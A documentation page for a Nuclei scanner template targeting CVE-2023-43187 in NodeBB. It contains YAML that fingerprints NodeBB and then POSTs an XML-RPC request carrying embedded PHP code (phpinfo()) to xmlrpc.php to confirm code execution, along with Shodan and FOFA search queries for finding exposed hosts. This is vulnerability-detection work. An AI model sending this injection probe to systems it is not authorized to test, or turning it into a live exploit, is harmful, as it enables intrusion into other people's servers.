Skip to content
Nuclei Templates

NodeBB XML-RPC Request xmlrpc.php - XML Injection

ID: CVE-2023-43187

Severity: critical

Author: 0xParth

Tags: cve,cve2023,nodebb,rce

Description

Section titled “Description”

A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.

YAML Source

Section titled “YAML Source”
id: CVE-2023-43187


info:
  name: NodeBB XML-RPC Request xmlrpc.php - XML Injection
  author: 0xParth
  severity: critical
  description: |
    A remote code execution (RCE) vulnerability in the xmlrpc.php endpoint of NodeBB Inc NodeBB forum software prior to v1.18.6 allows attackers to execute arbitrary code via crafted XML-RPC requests.
  reference:
    - https://github.com/jagat-singh-chaudhary/CVE/blob/main/CVE-2023-43187
    - https://nvd.nist.gov/vuln/detail/CVE-2023-43187
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-43187
    cwe-id: CWE-91
    epss-score: 0.2535
    epss-percentile: 0.96685
    cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: nodebb
    product: nodebb
    shodan-query: cpe:"cpe:2.3:a:nodebb:nodebb"
    fofa-query: "title=\"nodebb\""
  tags: cve,cve2023,nodebb,rce
flow: http(1) && http(2)


http:
  - method: GET
    path:
      - "{{BaseURL}}"


    matchers:
      - type: dsl
        internal: true
        dsl:
          - contains(to_lower(body), "nodebb")


  - method: POST
    path:
      - "{{BaseURL}}/xmlrpc.php"


    headers:
      Content-Type: "text/xml"


    body: |
      <?xml version="1.0"?>
      <methodCall>
        <methodName>system.listMethods</methodName>
        <params>
          <param>
            <value><?php phpinfo(); ?></value>
          </param>
        </params>
      </methodCall>


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<title>phpinfo()</title>"
          - "PHP Version"
        condition: or


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c2b4aa904a61e0f91af60fa0f18e079f32523c0439d21a234ebbb20d22401e4502205d6ebeaf72f8f066e110bdb6c1a8a3d893311d16d38afdc4c1ffa8ef85bfe927:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-43187.yaml"

View on Github